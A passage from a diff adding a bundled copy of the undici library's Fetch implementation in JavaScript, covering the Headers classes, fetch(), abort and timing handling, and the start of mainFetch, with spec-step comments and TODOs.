object[keys[i]]) + } + } else { + throw webidl.errors.conversionFailed({ + prefix: 'Headers constructor', + argument: 'Argument 1', + types: ['sequence>', 'record'] + }) + } +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-headers-append + */ +function appendHeader (headers, name, value) { + // 1. Normalize value. + value = headerValueNormalize(value) + + // 2. If name is not a header name or value is not a + // header value, then throw a TypeError. 
+ if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.append', + value: name, + type: 'header name' + }) + } else if (!isValidHeaderValue(value)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.append', + value, + type: 'header value' + }) + } + + // 3. If headers’s guard is "immutable", then throw a TypeError. + // 4. Otherwise, if headers’s guard is "request" and name is a + // forbidden header name, return. + // Note: undici does not implement forbidden header names + if (headers[kGuard] === 'immutable') { + throw new TypeError('immutable') + } else if (headers[kGuard] === 'request-no-cors') { + // 5. Otherwise, if headers’s guard is "request-no-cors": + // TODO + } + + // 6. Otherwise, if headers’s guard is "response" and name is a + // forbidden response-header name, return. + + // 7. Append (name, value) to headers’s header list. + return headers[kHeadersList].append(name, value) + + // 8. If headers’s guard is "request-no-cors", then remove + // privileged no-CORS request headers from headers +} + +class HeadersList { + /** @type {[string, string][]|null} */ + cookies = null + + constructor (init) { + if (init instanceof HeadersList) { + this[kHeadersMap] = new Map(init[kHeadersMap]) + this[kHeadersSortedMap] = init[kHeadersSortedMap] + this.cookies = init.cookies === null ? null : [...init.cookies] + } else { + this[kHeadersMap] = new Map(init) + this[kHeadersSortedMap] = null + } + } + + // https://fetch.spec.whatwg.org/#header-list-contains + contains (name) { + // A header list list contains a header name name if list + // contains a header whose name is a byte-case-insensitive + // match for name. + name = name.toLowerCase() + + return this[kHeadersMap].has(name) + } + + clear () { + this[kHeadersMap].clear() + this[kHeadersSortedMap] = null + this.cookies = null + } + + // https://fetch.spec.whatwg.org/#concept-header-list-append + append (name, value) { + this[kHeadersSortedMap] = null + + // 1. 
If list contains name, then set name to the first such + // header’s name. + const lowercaseName = name.toLowerCase() + const exists = this[kHeadersMap].get(lowercaseName) + + // 2. Append (name, value) to list. + if (exists) { + const delimiter = lowercaseName === 'cookie' ? '; ' : ', ' + this[kHeadersMap].set(lowercaseName, { + name: exists.name, + value: `${exists.value}${delimiter}${value}` + }) + } else { + this[kHeadersMap].set(lowercaseName, { name, value }) + } + + if (lowercaseName === 'set-cookie') { + this.cookies ??= [] + this.cookies.push(value) + } + } + + // https://fetch.spec.whatwg.org/#concept-header-list-set + set (name, value) { + this[kHeadersSortedMap] = null + const lowercaseName = name.toLowerCase() + + if (lowercaseName === 'set-cookie') { + this.cookies = [value] + } + + // 1. If list contains name, then set the value of + // the first such header to value and remove the + // others. + // 2. Otherwise, append header (name, value) to list. + this[kHeadersMap].set(lowercaseName, { name, value }) + } + + // https://fetch.spec.whatwg.org/#concept-header-list-delete + delete (name) { + this[kHeadersSortedMap] = null + + name = name.toLowerCase() + + if (name === 'set-cookie') { + this.cookies = null + } + + this[kHeadersMap].delete(name) + } + + // https://fetch.spec.whatwg.org/#concept-header-list-get + get (name) { + const value = this[kHeadersMap].get(name.toLowerCase()) + + // 1. If list does not contain name, then return null. + // 2. Return the values of all headers in list whose name + // is a byte-case-insensitive match for name, + // separated from each other by 0x2C 0x20, in order. + return value === undefined ? 
null : value.value + } + + * [Symbol.iterator] () { + // use the lowercased name + for (const [name, { value }] of this[kHeadersMap]) { + yield [name, value] + } + } + + get entries () { + const headers = {} + + if (this[kHeadersMap].size) { + for (const { name, value } of this[kHeadersMap].values()) { + headers[name] = value + } + } + + return headers + } +} + +// https://fetch.spec.whatwg.org/#headers-class +class Headers { + constructor (init = undefined) { + if (init === kConstruct) { + return + } + this[kHeadersList] = new HeadersList() + + // The new Headers(init) constructor steps are: + + // 1. Set this’s guard to "none". + this[kGuard] = 'none' + + // 2. If init is given, then fill this with init. + if (init !== undefined) { + init = webidl.converters.HeadersInit(init) + fill(this, init) + } + } + + // https://fetch.spec.whatwg.org/#dom-headers-append + append (name, value) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.append' }) + + name = webidl.converters.ByteString(name) + value = webidl.converters.ByteString(value) + + return appendHeader(this, name, value) + } + + // https://fetch.spec.whatwg.org/#dom-headers-delete + delete (name) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.delete' }) + + name = webidl.converters.ByteString(name) + + // 1. If name is not a header name, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.delete', + value: name, + type: 'header name' + }) + } + + // 2. If this’s guard is "immutable", then throw a TypeError. + // 3. Otherwise, if this’s guard is "request" and name is a + // forbidden header name, return. + // 4. Otherwise, if this’s guard is "request-no-cors", name + // is not a no-CORS-safelisted request-header name, and + // name is not a privileged no-CORS request-header name, + // return. + // 5. 
Otherwise, if this’s guard is "response" and name is + // a forbidden response-header name, return. + // Note: undici does not implement forbidden header names + if (this[kGuard] === 'immutable') { + throw new TypeError('immutable') + } else if (this[kGuard] === 'request-no-cors') { + // TODO + } + + // 6. If this’s header list does not contain name, then + // return. + if (!this[kHeadersList].contains(name)) { + return + } + + // 7. Delete name from this’s header list. + // 8. If this’s guard is "request-no-cors", then remove + // privileged no-CORS request headers from this. + this[kHeadersList].delete(name) + } + + // https://fetch.spec.whatwg.org/#dom-headers-get + get (name) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.get' }) + + name = webidl.converters.ByteString(name) + + // 1. If name is not a header name, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.get', + value: name, + type: 'header name' + }) + } + + // 2. Return the result of getting name from this’s header + // list. + return this[kHeadersList].get(name) + } + + // https://fetch.spec.whatwg.org/#dom-headers-has + has (name) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.has' }) + + name = webidl.converters.ByteString(name) + + // 1. If name is not a header name, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.has', + value: name, + type: 'header name' + }) + } + + // 2. Return true if this’s header list contains name; + // otherwise false. 
+ return this[kHeadersList].contains(name) + } + + // https://fetch.spec.whatwg.org/#dom-headers-set + set (name, value) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.set' }) + + name = webidl.converters.ByteString(name) + value = webidl.converters.ByteString(value) + + // 1. Normalize value. + value = headerValueNormalize(value) + + // 2. If name is not a header name or value is not a + // header value, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.set', + value: name, + type: 'header name' + }) + } else if (!isValidHeaderValue(value)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.set', + value, + type: 'header value' + }) + } + + // 3. If this’s guard is "immutable", then throw a TypeError. + // 4. Otherwise, if this’s guard is "request" and name is a + // forbidden header name, return. + // 5. Otherwise, if this’s guard is "request-no-cors" and + // name/value is not a no-CORS-safelisted request-header, + // return. + // 6. Otherwise, if this’s guard is "response" and name is a + // forbidden response-header name, return. + // Note: undici does not implement forbidden header names + if (this[kGuard] === 'immutable') { + throw new TypeError('immutable') + } else if (this[kGuard] === 'request-no-cors') { + // TODO + } + + // 7. Set (name, value) in this’s header list. + // 8. If this’s guard is "request-no-cors", then remove + // privileged no-CORS request headers from this + this[kHeadersList].set(name, value) + } + + // https://fetch.spec.whatwg.org/#dom-headers-getsetcookie + getSetCookie () { + webidl.brandCheck(this, Headers) + + // 1. If this’s header list does not contain `Set-Cookie`, then return « ». + // 2. Return the values of all headers in this’s header list whose name is + // a byte-case-insensitive match for `Set-Cookie`, in order. 
+ + const list = this[kHeadersList].cookies + + if (list) { + return [...list] + } + + return [] + } + + // https://fetch.spec.whatwg.org/#concept-header-list-sort-and-combine + get [kHeadersSortedMap] () { + if (this[kHeadersList][kHeadersSortedMap]) { + return this[kHeadersList][kHeadersSortedMap] + } + + // 1. Let headers be an empty list of headers with the key being the name + // and value the value. + const headers = [] + + // 2. Let names be the result of convert header names to a sorted-lowercase + // set with all the names of the headers in list. + const names = [...this[kHeadersList]].sort((a, b) => a[0] < b[0] ? -1 : 1) + const cookies = this[kHeadersList].cookies + + // 3. For each name of names: + for (let i = 0; i < names.length; ++i) { + const [name, value] = names[i] + // 1. If name is `set-cookie`, then: + if (name === 'set-cookie') { + // 1. Let values be a list of all values of headers in list whose name + // is a byte-case-insensitive match for name, in order. + + // 2. For each value of values: + // 1. Append (name, value) to headers. + for (let j = 0; j < cookies.length; ++j) { + headers.push([name, cookies[j]]) + } + } else { + // 2. Otherwise: + + // 1. Let value be the result of getting name from list. + + // 2. Assert: value is non-null. + assert(value !== null) + + // 3. Append (name, value) to headers. + headers.push([name, value]) + } + } + + this[kHeadersList][kHeadersSortedMap] = headers + + // 4. Return headers. 
+ return headers + } + + keys () { + webidl.brandCheck(this, Headers) + + if (this[kGuard] === 'immutable') { + const value = this[kHeadersSortedMap] + return makeIterator(() => value, 'Headers', + 'key') + } + + return makeIterator( + () => [...this[kHeadersSortedMap].values()], + 'Headers', + 'key' + ) + } + + values () { + webidl.brandCheck(this, Headers) + + if (this[kGuard] === 'immutable') { + const value = this[kHeadersSortedMap] + return makeIterator(() => value, 'Headers', + 'value') + } + + return makeIterator( + () => [...this[kHeadersSortedMap].values()], + 'Headers', + 'value' + ) + } + + entries () { + webidl.brandCheck(this, Headers) + + if (this[kGuard] === 'immutable') { + const value = this[kHeadersSortedMap] + return makeIterator(() => value, 'Headers', + 'key+value') + } + + return makeIterator( + () => [...this[kHeadersSortedMap].values()], + 'Headers', + 'key+value' + ) + } + + /** + * @param {(value: string, key: string, self: Headers) => void} callbackFn + * @param {unknown} thisArg + */ + forEach (callbackFn, thisArg = globalThis) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.forEach' }) + + if (typeof callbackFn !== 'function') { + throw new TypeError( + "Failed to execute 'forEach' on 'Headers': parameter 1 is not of type 'Function'." 
+ ) + } + + for (const [key, value] of this) { + callbackFn.apply(thisArg, [value, key, this]) + } + } + + [Symbol.for('nodejs.util.inspect.custom')] () { + webidl.brandCheck(this, Headers) + + return this[kHeadersList] + } +} + +Headers.prototype[Symbol.iterator] = Headers.prototype.entries + +Object.defineProperties(Headers.prototype, { + append: kEnumerableProperty, + delete: kEnumerableProperty, + get: kEnumerableProperty, + has: kEnumerableProperty, + set: kEnumerableProperty, + getSetCookie: kEnumerableProperty, + keys: kEnumerableProperty, + values: kEnumerableProperty, + entries: kEnumerableProperty, + forEach: kEnumerableProperty, + [Symbol.iterator]: { enumerable: false }, + [Symbol.toStringTag]: { + value: 'Headers', + configurable: true + } +}) + +webidl.converters.HeadersInit = function (V) { + if (webidl.util.Type(V) === 'Object') { + if (V[Symbol.iterator]) { + return webidl.converters['sequence>'](V) + } + + return webidl.converters['record'](V) + } + + throw webidl.errors.conversionFailed({ + prefix: 'Headers constructor', + argument: 'Argument 1', + types: ['sequence>', 'record'] + }) +} + +module.exports = { + fill, + Headers, + HeadersList +} + + +/***/ }), + +/***/ 4881: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// https://github.com/Ethan-Arrowood/undici-fetch + + + +const { + Response, + makeNetworkError, + makeAppropriateNetworkError, + filterResponse, + makeResponse +} = __nccwpck_require__(7823) +const { Headers } = __nccwpck_require__(554) +const { Request, makeRequest } = __nccwpck_require__(8359) +const zlib = __nccwpck_require__(9796) +const { + bytesMatch, + makePolicyContainer, + clonePolicyContainer, + requestBadPort, + TAOCheck, + appendRequestOriginHeader, + responseLocationURL, + requestCurrentURL, + setRequestReferrerPolicyOnRedirect, + tryUpgradeRequestToAPotentiallyTrustworthyURL, + createOpaqueTimingInfo, + appendFetchMetadata, + corsCheck, + crossOriginResourcePolicyCheck, + 
determineRequestsReferrer, + coarsenedSharedCurrentTime, + createDeferredPromise, + isBlobLike, + sameOrigin, + isCancelled, + isAborted, + isErrorLike, + fullyReadBody, + readableStreamClose, + isomorphicEncode, + urlIsLocal, + urlIsHttpHttpsScheme, + urlHasHttpsScheme +} = __nccwpck_require__(2538) +const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) +const assert = __nccwpck_require__(9491) +const { safelyExtractBody } = __nccwpck_require__(1472) +const { + redirectStatusSet, + nullBodyStatus, + safeMethodsSet, + requestBodyHeader, + subresourceSet, + DOMException +} = __nccwpck_require__(1037) +const { kHeadersList } = __nccwpck_require__(2785) +const EE = __nccwpck_require__(2361) +const { Readable, pipeline } = __nccwpck_require__(2781) +const { addAbortListener, isErrored, isReadable, nodeMajor, nodeMinor } = __nccwpck_require__(3983) +const { dataURLProcessor, serializeAMimeType } = __nccwpck_require__(685) +const { TransformStream } = __nccwpck_require__(5356) +const { getGlobalDispatcher } = __nccwpck_require__(1892) +const { webidl } = __nccwpck_require__(1744) +const { STATUS_CODES } = __nccwpck_require__(3685) +const GET_OR_HEAD = ['GET', 'HEAD'] + +/** @type {import('buffer').resolveObjectURL} */ +let resolveObjectURL +let ReadableStream = globalThis.ReadableStream + +class Fetch extends EE { + constructor (dispatcher) { + super() + + this.dispatcher = dispatcher + this.connection = null + this.dump = false + this.state = 'ongoing' + // 2 terminated listeners get added per request, + // but only 1 gets removed. If there are 20 redirects, + // 21 listeners will be added. + // See https://github.com/nodejs/undici/issues/1711 + // TODO (fix): Find and fix root cause for leaked listener. 
+ this.setMaxListeners(21) + } + + terminate (reason) { + if (this.state !== 'ongoing') { + return + } + + this.state = 'terminated' + this.connection?.destroy(reason) + this.emit('terminated', reason) + } + + // https://fetch.spec.whatwg.org/#fetch-controller-abort + abort (error) { + if (this.state !== 'ongoing') { + return + } + + // 1. Set controller’s state to "aborted". + this.state = 'aborted' + + // 2. Let fallbackError be an "AbortError" DOMException. + // 3. Set error to fallbackError if it is not given. + if (!error) { + error = new DOMException('The operation was aborted.', 'AbortError') + } + + // 4. Let serializedError be StructuredSerialize(error). + // If that threw an exception, catch it, and let + // serializedError be StructuredSerialize(fallbackError). + + // 5. Set controller’s serialized abort reason to serializedError. + this.serializedAbortReason = error + + this.connection?.destroy(error) + this.emit('terminated', error) + } +} + +// https://fetch.spec.whatwg.org/#fetch-method +function fetch (input, init = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'globalThis.fetch' }) + + // 1. Let p be a new promise. + const p = createDeferredPromise() + + // 2. Let requestObject be the result of invoking the initial value of + // Request as constructor with input and init as arguments. If this throws + // an exception, reject p with it and return p. + let requestObject + + try { + requestObject = new Request(input, init) + } catch (e) { + p.reject(e) + return p.promise + } + + // 3. Let request be requestObject’s request. + const request = requestObject[kState] + + // 4. If requestObject’s signal’s aborted flag is set, then: + if (requestObject.signal.aborted) { + // 1. Abort the fetch() call with p, request, null, and + // requestObject’s signal’s abort reason. + abortFetch(p, request, null, requestObject.signal.reason) + + // 2. Return p. + return p.promise + } + + // 5. Let globalObject be request’s client’s global object. 
+ const globalObject = request.client.globalObject + + // 6. If globalObject is a ServiceWorkerGlobalScope object, then set + // request’s service-workers mode to "none". + if (globalObject?.constructor?.name === 'ServiceWorkerGlobalScope') { + request.serviceWorkers = 'none' + } + + // 7. Let responseObject be null. + let responseObject = null + + // 8. Let relevantRealm be this’s relevant Realm. + const relevantRealm = null + + // 9. Let locallyAborted be false. + let locallyAborted = false + + // 10. Let controller be null. + let controller = null + + // 11. Add the following abort steps to requestObject’s signal: + addAbortListener( + requestObject.signal, + () => { + // 1. Set locallyAborted to true. + locallyAborted = true + + // 2. Assert: controller is non-null. + assert(controller != null) + + // 3. Abort controller with requestObject’s signal’s abort reason. + controller.abort(requestObject.signal.reason) + + // 4. Abort the fetch() call with p, request, responseObject, + // and requestObject’s signal’s abort reason. + abortFetch(p, request, responseObject, requestObject.signal.reason) + } + ) + + // 12. Let handleFetchDone given response response be to finalize and + // report timing with response, globalObject, and "fetch". + const handleFetchDone = (response) => + finalizeAndReportTiming(response, 'fetch') + + // 13. Set controller to the result of calling fetch given request, + // with processResponseEndOfBody set to handleFetchDone, and processResponse + // given response being these substeps: + + const processResponse = (response) => { + // 1. If locallyAborted is true, terminate these substeps. + if (locallyAborted) { + return Promise.resolve() + } + + // 2. If response’s aborted flag is set, then: + if (response.aborted) { + // 1. Let deserializedError be the result of deserialize a serialized + // abort reason given controller’s serialized abort reason and + // relevantRealm. + + // 2. 
Abort the fetch() call with p, request, responseObject, and + // deserializedError. + + abortFetch(p, request, responseObject, controller.serializedAbortReason) + return Promise.resolve() + } + + // 3. If response is a network error, then reject p with a TypeError + // and terminate these substeps. + if (response.type === 'error') { + p.reject( + Object.assign(new TypeError('fetch failed'), { cause: response.error }) + ) + return Promise.resolve() + } + + // 4. Set responseObject to the result of creating a Response object, + // given response, "immutable", and relevantRealm. + responseObject = new Response() + responseObject[kState] = response + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kHeadersList] = response.headersList + responseObject[kHeaders][kGuard] = 'immutable' + responseObject[kHeaders][kRealm] = relevantRealm + + // 5. Resolve p with responseObject. + p.resolve(responseObject) + } + + controller = fetching({ + request, + processResponseEndOfBody: handleFetchDone, + processResponse, + dispatcher: init.dispatcher ?? getGlobalDispatcher() // undici + }) + + // 14. Return p. + return p.promise +} + +// https://fetch.spec.whatwg.org/#finalize-and-report-timing +function finalizeAndReportTiming (response, initiatorType = 'other') { + // 1. If response is an aborted network error, then return. + if (response.type === 'error' && response.aborted) { + return + } + + // 2. If response’s URL list is null or empty, then return. + if (!response.urlList?.length) { + return + } + + // 3. Let originalURL be response’s URL list[0]. + const originalURL = response.urlList[0] + + // 4. Let timingInfo be response’s timing info. + let timingInfo = response.timingInfo + + // 5. Let cacheState be response’s cache state. + let cacheState = response.cacheState + + // 6. If originalURL’s scheme is not an HTTP(S) scheme, then return. + if (!urlIsHttpHttpsScheme(originalURL)) { + return + } + + // 7. If timingInfo is null, then return. 
+ if (timingInfo === null) { + return + } + + // 8. If response’s timing allow passed flag is not set, then: + if (!response.timingAllowPassed) { + // 1. Set timingInfo to a the result of creating an opaque timing info for timingInfo. + timingInfo = createOpaqueTimingInfo({ + startTime: timingInfo.startTime + }) + + // 2. Set cacheState to the empty string. + cacheState = '' + } + + // 9. Set timingInfo’s end time to the coarsened shared current time + // given global’s relevant settings object’s cross-origin isolated + // capability. + // TODO: given global’s relevant settings object’s cross-origin isolated + // capability? + timingInfo.endTime = coarsenedSharedCurrentTime() + + // 10. Set response’s timing info to timingInfo. + response.timingInfo = timingInfo + + // 11. Mark resource timing for timingInfo, originalURL, initiatorType, + // global, and cacheState. + markResourceTiming( + timingInfo, + originalURL, + initiatorType, + globalThis, + cacheState + ) +} + +// https://w3c.github.io/resource-timing/#dfn-mark-resource-timing +function markResourceTiming (timingInfo, originalURL, initiatorType, globalThis, cacheState) { + if (nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 2)) { + performance.markResourceTiming(timingInfo, originalURL.href, initiatorType, globalThis, cacheState) + } +} + +// https://fetch.spec.whatwg.org/#abort-fetch +function abortFetch (p, request, responseObject, error) { + // Note: AbortSignal.reason was added in node v17.2.0 + // which would give us an undefined error to reject with. + // Remove this once node v16 is no longer supported. + if (!error) { + error = new DOMException('The operation was aborted.', 'AbortError') + } + + // 1. Reject promise with error. + p.reject(error) + + // 2. If request’s body is not null and is readable, then cancel request’s + // body with error. 
+ if (request.body != null && isReadable(request.body?.stream)) { + request.body.stream.cancel(error).catch((err) => { + if (err.code === 'ERR_INVALID_STATE') { + // Node bug? + return + } + throw err + }) + } + + // 3. If responseObject is null, then return. + if (responseObject == null) { + return + } + + // 4. Let response be responseObject’s response. + const response = responseObject[kState] + + // 5. If response’s body is not null and is readable, then error response’s + // body with error. + if (response.body != null && isReadable(response.body?.stream)) { + response.body.stream.cancel(error).catch((err) => { + if (err.code === 'ERR_INVALID_STATE') { + // Node bug? + return + } + throw err + }) + } +} + +// https://fetch.spec.whatwg.org/#fetching +function fetching ({ + request, + processRequestBodyChunkLength, + processRequestEndOfBody, + processResponse, + processResponseEndOfBody, + processResponseConsumeBody, + useParallelQueue = false, + dispatcher // undici +}) { + // 1. Let taskDestination be null. + let taskDestination = null + + // 2. Let crossOriginIsolatedCapability be false. + let crossOriginIsolatedCapability = false + + // 3. If request’s client is non-null, then: + if (request.client != null) { + // 1. Set taskDestination to request’s client’s global object. + taskDestination = request.client.globalObject + + // 2. Set crossOriginIsolatedCapability to request’s client’s cross-origin + // isolated capability. + crossOriginIsolatedCapability = + request.client.crossOriginIsolatedCapability + } + + // 4. If useParallelQueue is true, then set taskDestination to the result of + // starting a new parallel queue. + // TODO + + // 5. Let timingInfo be a new fetch timing info whose start time and + // post-redirect start time are the coarsened shared current time given + // crossOriginIsolatedCapability. 
+ const currenTime = coarsenedSharedCurrentTime(crossOriginIsolatedCapability) + const timingInfo = createOpaqueTimingInfo({ + startTime: currenTime + }) + + // 6. Let fetchParams be a new fetch params whose + // request is request, + // timing info is timingInfo, + // process request body chunk length is processRequestBodyChunkLength, + // process request end-of-body is processRequestEndOfBody, + // process response is processResponse, + // process response consume body is processResponseConsumeBody, + // process response end-of-body is processResponseEndOfBody, + // task destination is taskDestination, + // and cross-origin isolated capability is crossOriginIsolatedCapability. + const fetchParams = { + controller: new Fetch(dispatcher), + request, + timingInfo, + processRequestBodyChunkLength, + processRequestEndOfBody, + processResponse, + processResponseConsumeBody, + processResponseEndOfBody, + taskDestination, + crossOriginIsolatedCapability + } + + // 7. If request’s body is a byte sequence, then set request’s body to + // request’s body as a body. + // NOTE: Since fetching is only called from fetch, body should already be + // extracted. + assert(!request.body || request.body.stream) + + // 8. If request’s window is "client", then set request’s window to request’s + // client, if request’s client’s global object is a Window object; otherwise + // "no-window". + if (request.window === 'client') { + // TODO: What if request.client is null? + request.window = + request.client?.globalObject?.constructor?.name === 'Window' + ? request.client + : 'no-window' + } + + // 9. If request’s origin is "client", then set request’s origin to request’s + // client’s origin. + if (request.origin === 'client') { + // TODO: What if request.client is null? + request.origin = request.client?.origin + } + + // 10. If all of the following conditions are true: + // TODO + + // 11. 
If request’s policy container is "client", then: + if (request.policyContainer === 'client') { + // 1. If request’s client is non-null, then set request’s policy + // container to a clone of request’s client’s policy container. [HTML] + if (request.client != null) { + request.policyContainer = clonePolicyContainer( + request.client.policyContainer + ) + } else { + // 2. Otherwise, set request’s policy container to a new policy + // container. + request.policyContainer = makePolicyContainer() + } + } + + // 12. If request’s header list does not contain `Accept`, then: + if (!request.headersList.contains('accept')) { + // 1. Let value be `*/*`. + const value = '*/*' + + // 2. A user agent should set value to the first matching statement, if + // any, switching on request’s destination: + // "document" + // "frame" + // "iframe" + // `text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8` + // "image" + // `image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5` + // "style" + // `text/css,*/*;q=0.1` + // TODO + + // 3. Append `Accept`/value to request’s header list. + request.headersList.append('accept', value) + } + + // 13. If request’s header list does not contain `Accept-Language`, then + // user agents should append `Accept-Language`/an appropriate value to + // request’s header list. + if (!request.headersList.contains('accept-language')) { + request.headersList.append('accept-language', '*') + } + + // 14. If request’s priority is null, then use request’s initiator and + // destination appropriately in setting request’s priority to a + // user-agent-defined object. + if (request.priority === null) { + // TODO + } + + // 15. If request is a subresource request, then: + if (subresourceSet.has(request.destination)) { + // TODO + } + + // 16. Run main fetch given fetchParams. + mainFetch(fetchParams) + .catch(err => { + fetchParams.controller.terminate(err) + }) + + // 17. 
Return fetchParam's controller + return fetchParams.controller +} + +// https://fetch.spec.whatwg.org/#concept-main-fetch +async function mainFetch (fetchParams, recursive = false) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let response be null. + let response = null + + // 3. If request’s local-URLs-only flag is set and request’s current URL is + // not local, then set response to a network error. + if (request.localURLsOnly && !urlIsLocal(requestCurrentURL(request))) { + response = makeNetworkError('local URLs only') + } + + // 4. Run report Content Security Policy violations for request. + // TODO + + // 5. Upgrade request to a potentially trustworthy URL, if appropriate. + tryUpgradeRequestToAPotentiallyTrustworthyURL(request) + + // 6. If should request be blocked due to a bad port, should fetching request + // be blocked as mixed content, or should request be blocked by Content + // Security Policy returns blocked, then set response to a network error. + if (requestBadPort(request) === 'blocked') { + response = makeNetworkError('bad port') + } + // TODO: should fetching request be blocked as mixed content? + // TODO: should request be blocked by Content Security Policy? + + // 7. If request’s referrer policy is the empty string, then set request’s + // referrer policy to request’s policy container’s referrer policy. + if (request.referrerPolicy === '') { + request.referrerPolicy = request.policyContainer.referrerPolicy + } + + // 8. If request’s referrer is not "no-referrer", then set request’s + // referrer to the result of invoking determine request’s referrer. + if (request.referrer !== 'no-referrer') { + request.referrer = determineRequestsReferrer(request) + } + + // 9. 
Set request’s current URL’s scheme to "https" if all of the following + // conditions are true: + // - request’s current URL’s scheme is "http" + // - request’s current URL’s host is a domain + // - Matching request’s current URL’s host per Known HSTS Host Domain Name + // Matching results in either a superdomain match with an asserted + // includeSubDomains directive or a congruent match (with or without an + // asserted includeSubDomains directive). [HSTS] + // TODO + + // 10. If recursive is false, then run the remaining steps in parallel. + // TODO + + // 11. If response is null, then set response to the result of running + // the steps corresponding to the first matching statement: + if (response === null) { + response = await (async () => { + const currentURL = requestCurrentURL(request) + + if ( + // - request’s current URL’s origin is same origin with request’s origin, + // and request’s response tainting is "basic" + (sameOrigin(currentURL, request.url) && request.responseTainting === 'basic') || + // request’s current URL’s scheme is "data" + (currentURL.protocol === 'data:') || + // - request’s mode is "navigate" or "websocket" + (request.mode === 'navigate' || request.mode === 'websocket') + ) { + // 1. Set request’s response tainting to "basic". + request.responseTainting = 'basic' + + // 2. Return the result of running scheme fetch given fetchParams. + return await schemeFetch(fetchParams) + } + + // request’s mode is "same-origin" + if (request.mode === 'same-origin') { + // 1. Return a network error. + return makeNetworkError('request mode cannot be "same-origin"') + } + + // request’s mode is "no-cors" + if (request.mode === 'no-cors') { + // 1. If request’s redirect mode is not "follow", then return a network + // error. + if (request.redirect !== 'follow') { + return makeNetworkError( + 'redirect mode cannot be "follow" for "no-cors" request' + ) + } + + // 2. Set request’s response tainting to "opaque". 
+ request.responseTainting = 'opaque' + + // 3. Return the result of running scheme fetch given fetchParams. + return await schemeFetch(fetchParams) + } + + // request’s current URL’s scheme is not an HTTP(S) scheme + if (!urlIsHttpHttpsScheme(requestCurrentURL(request))) { + // Return a network error. + return makeNetworkError('URL scheme must be a HTTP(S) scheme') + } + + // - request’s use-CORS-preflight flag is set + // - request’s unsafe-request flag is set and either request’s method is + // not a CORS-safelisted method or CORS-unsafe request-header names with + // request’s header list is not empty + // 1. Set request’s response tainting to "cors". + // 2. Let corsWithPreflightResponse be the result of running HTTP fetch + // given fetchParams and true. + // 3. If corsWithPreflightResponse is a network error, then clear cache + // entries using request. + // 4. Return corsWithPreflightResponse. + // TODO + + // Otherwise + // 1. Set request’s response tainting to "cors". + request.responseTainting = 'cors' + + // 2. Return the result of running HTTP fetch given fetchParams. + return await httpFetch(fetchParams) + })() + } + + // 12. If recursive is true, then return response. + if (recursive) { + return response + } + + // 13. If response is not a network error and response is not a filtered + // response, then: + if (response.status !== 0 && !response.internalResponse) { + // If request’s response tainting is "cors", then: + if (request.responseTainting === 'cors') { + // 1. Let headerNames be the result of extracting header list values + // given `Access-Control-Expose-Headers` and response’s header list. + // TODO + // 2. If request’s credentials mode is not "include" and headerNames + // contains `*`, then set response’s CORS-exposed header-name list to + // all unique header names in response’s header list. + // TODO + // 3. Otherwise, if headerNames is not null or failure, then set + // response’s CORS-exposed header-name list to headerNames. 
+ // TODO + } + + // Set response to the following filtered response with response as its + // internal response, depending on request’s response tainting: + if (request.responseTainting === 'basic') { + response = filterResponse(response, 'basic') + } else if (request.responseTainting === 'cors') { + response = filterResponse(response, 'cors') + } else if (request.responseTainting === 'opaque') { + response = filterResponse(response, 'opaque') + } else { + assert(false) + } + } + + // 14. Let internalResponse be response, if response is a network error, + // and response’s internal response otherwise. + let internalResponse = + response.status === 0 ? response : response.internalResponse + + // 15. If internalResponse’s URL list is empty, then set it to a clone of + // request’s URL list. + if (internalResponse.urlList.length === 0) { + internalResponse.urlList.push(...request.urlList) + } + + // 16. If request’s timing allow failed flag is unset, then set + // internalResponse’s timing allow passed flag. + if (!request.timingAllowFailed) { + response.timingAllowPassed = true + } + + // 17. If response is not a network error and any of the following returns + // blocked + // - should internalResponse to request be blocked as mixed content + // - should internalResponse to request be blocked by Content Security Policy + // - should internalResponse to request be blocked due to its MIME type + // - should internalResponse to request be blocked due to nosniff + // TODO + + // 18. If response’s type is "opaque", internalResponse’s status is 206, + // internalResponse’s range-requested flag is set, and request’s header + // list does not contain `Range`, then set response and internalResponse + // to a network error. + if ( + response.type === 'opaque' && + internalResponse.status === 206 && + internalResponse.rangeRequested && + !request.headers.contains('range') + ) { + response = internalResponse = makeNetworkError() + } + + // 19. 
